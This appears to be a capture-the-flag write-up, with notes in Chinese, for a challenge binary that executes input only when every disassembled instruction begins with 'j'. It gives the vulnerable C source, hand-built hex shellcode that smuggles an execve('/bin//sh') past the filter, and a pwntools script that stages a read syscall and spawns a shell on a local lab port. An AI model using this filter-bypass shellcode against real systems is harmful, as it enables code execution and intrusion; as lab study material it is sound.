# shellcode5
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
#include <capstone/capstone.h>
#include <sys/mman.h>
int upkeep() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
}
int validate(char* ptr, size_t len) {
csh handle;
cs_insn insn;
int ret = 1;
if (cs_open(CS_ARCH_X86, CS_MODE_64, &handle) != CS_ERR_OK) {
return 0;
}
size_t count = cs_disasm(handle, ptr, len, 0, 0, &insn);
size_t success_len = 0;
if (count > 0) {
for (size_t j = 0; j < count; j++) {
ret &= insn[j].mnemonic[0] == 'j';
success_len += insn[j].size;
}
cs_free(insn, count);
} else {
return 0;
}
cs_close(&handle);
ret &= len == success_len;
return ret;
}
int main() {
upkeep();
char code[4096];
size_t n = read(0, code, 0x1000);
if (n > 0 && validate(code, n)) {
((void ()())code)();
}
return 0;
}
要满足 shellcode 都是 j 开头的指令
所以就是每一次先 jmp 下一条指令,然后短跳转开始我们的 shellcode 指令
EB 01 E9 48 31 FF 90 | |
EB 01 E9 48 31 F6 90 | |
EB 01 E9 48 31 D2 90 | |
EB 01 E9 48 31 C0 90 | |
EB 01 E9 48 31 DB 90 | |
EB 01 E9 50 90 90 90 | |
EB 01 E9 B3 68 90 90 | |
EB 01 E9 48 C1 E3 08 | |
EB 01 E9 B3 73 90 90 | |
EB 01 E9 48 C1 E3 08 | |
EB 01 E9 B3 2F 90 90 | |
EB 01 E9 48 C1 E3 08 | |
EB 01 E9 B3 2F 90 90 | |
EB 01 E9 48 C1 E3 08 | |
EB 01 E9 B3 6E 90 90 | |
EB 01 E9 48 C1 E3 08 | |
EB 01 E9 B3 69 90 90 | |
EB 01 E9 48 C1 E3 08 | |
EB 01 E9 B3 62 90 90 | |
EB 01 E9 48 C1 E3 08 | |
EB 01 E9 B3 2F 90 90 | |
EB 01 E9 53 90 90 90 | |
EB 01 E9 48 89 E7 90 | |
EB 01 E9 B0 3B 90 90 | |
EB 01 E9 0F 05 90 90 |
汇编是这样
from pwn import * | |
elf = ELF("shellcode5") | |
context.log_level = "debug" | |
context.binary = elf | |
skip = asm(""" | |
jmp here+1 | |
here: | |
""") | |
set_rdi_rsi = asm(""" | |
push rdx | |
pop rsi | |
xor edi, edi | |
""") | |
set_rdx = asm(""" | |
mov al, 255 | |
mov edx, eax | |
""") | |
set_rax_syscall = asm(""" | |
xor eax, eax | |
syscall | |
""") | |
# rax = 0, rdi = 0, rsi = ptr, rdx = len | |
p = remote("127.0.0.1", 37251) | |
# p = process() | |
# p = elf.debug() | |
first = skip + b"\xe9" + set_rdi_rsi + skip + b"\xe9" + set_rdx + skip + | |
b"\xe9" + set_rax_syscall | |
p.send(first) | |
pause() | |
p.send(b"A" * len(first) + asm(shellcraft.sh())) | |
p.interactive() |
